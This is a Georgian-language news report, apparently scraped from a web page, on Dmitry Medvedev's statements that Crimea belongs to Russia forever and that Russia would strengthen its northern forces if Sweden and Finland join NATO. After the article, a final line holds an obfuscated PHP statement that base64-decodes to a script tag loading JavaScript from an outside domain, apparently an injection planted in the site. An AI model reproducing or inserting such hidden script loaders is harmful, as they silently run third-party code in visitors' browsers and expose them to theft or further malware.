celsiusi
ავერსი საქკაბელი
ჩვენთვის ყირიმი რუსეთის ნაწილია და ეს სამუდამოდ ასე იქნება – ამის შესახებ რუსეთის უშიშროების საბჭოს ხელმძღვანელის მოადგილემ რუსულ მედიასთან ინტერვიუში განაცხადა.
 
მედვედევმა აღნიშნა, რომ ნატო-ში უკრაინის გაწევრიანება რუსეთისთვის უფრო საშიშია, ვიდრე შვედეთის და ფინეთის. მისი თქმით, რუსეთი არ არის შვედეთის და ფინეთის გაწევრიანების წინააღმდეგი, თუმცა ამ შემთხვევაში საკუთარი საზღვრების გამაგრება მოუწევს.
 
„ჩვენთვის ყირიმი რუსეთის ნაწილია და ეს სამუდამოდ ასე იქნება. ყირიმის ხელყოფის ნებისმიერი მცდელობა არის ომის გამოცხადება ჩვენი ქვეყნისთვის და თუ ამას ნატო-ს წევრი ქვეყანა აკეთებს, ეს არის კონფლიქტი მთელ ჩრდილოატლანტიკურ ალიანსთან, მესამე მსოფლიო ომი, ტოტალური კატასტროფა.
 
შვედეთის და ფინეთის გაწევრიანება ნატო-ში რაიმე განსაკუთრებულად ახლით არ გვემუქრება. ამ ქვეყნებს ადრე ჰქონდათ რუსეთთან ურთიერთობა, რომელსაც შეიძლება ეწოდოს საკმაოდ პატივსაცემი და კეთილსინდისიერი. თუმცა, წარსულში რა თქმა უნდა ხდებოდა სხვადასხვა რამ. ახლა ჩვენ არ გვაქვს და მოსალოდნელიც არ არის ამ ქვეყნებთან ტერიტორიული დავები“, – განაცხადა მედვედევმა.
 
მან ხაზგასმით აღნიშნა, რომ ამ ქვეყნების გაწევრიანების შემთხვევაში რუსეთი მზად იქნება საპასუხო ნაბიჯებისთვისაც.
 
„ნატო-ს ასეთი გაფართოების შემთხვევაში, მისი სახმელეთო საზღვრების სიგრძე რუსეთთან გაორმაგდება. ჩვენ მოგვიწევს ამ საზღვრების გაძლიერება. ბალტიის ქვეყნების არაბირთვული სტატუსი წარსულს ჩაბარდება და სერიოზულად გაიზრდება სახმელეთო ჯარების და საზღვაო ძალების ჯგუფები ჩრდილოეთის მიმართულებით“, – განაცხადა მედვედევმა.
 
775
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");